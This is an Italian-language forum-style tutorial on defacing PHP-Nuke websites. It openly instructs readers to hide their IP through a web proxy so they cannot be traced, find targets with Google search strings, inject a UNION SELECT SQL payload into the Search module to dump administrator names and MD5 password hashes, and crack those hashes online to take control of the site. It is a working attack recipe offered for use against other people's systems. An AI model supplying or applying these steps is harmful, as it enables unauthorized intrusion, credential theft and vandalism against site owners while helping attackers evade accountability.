GUIDA COME DEFACCIARE UN SITO IN PHPNUKEAllora iniziamo prima di tutto bisogna proxarsi sennò vi posono denunciare tramite l'ip per questo andate su
https://www.megaproxy.com/freesurf/ e scrivete il sito dove volete che il vostro ip sia camuffato (c'è un limite di link che si possono inserire al giorno) dopo cercate su google una di queste quattro stringe
Powered by PhpNuke
CODICE
allinurl:phpnuke/modules.php?name=Search
allinurl:html/modules.php?name=Search
inurl:modules.php?name=Search
e trovate il sito vulnerabile al phpnuke (lo noterete perchè dopo il link c'è questa stringa "/phpnuke" ) trovato il sito cercate il modulo search aggiungengo questa stringa al link modules.php?name=Search se nella barra degli indirizzi del sito c'è già questa stringa non aggiungete niente ora andate sul sito proxi e copiate il link per esempio
http://sito.com/phpnuke/ modules.php?name=Search e fate clic su Surf ora siete proxati nel sito ora ricopiate il link del sito sulla nuova pagina generata e nella nuova barra degli indirizzi e aggiungete questa stringa
CODICE
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Se avete trovato il sito vulnerabile vi usciranno tutte le password in MD5 degli admin con i relativi nomi in caso contrario vi usciranno una di queste parole (illegal operation, oppure verrete rieindirizzati ad un altro sito o l'ultimo caso vi uscirà "Modulo non inserito")
Ora avete tutte le password degli admin crakkate in MD5 per convertirle andate su
http://md5.rednoize.com/scrivete la password ed il gioco è fatto ora siete ammisistratori.
FONTE:
http://sciax2.it
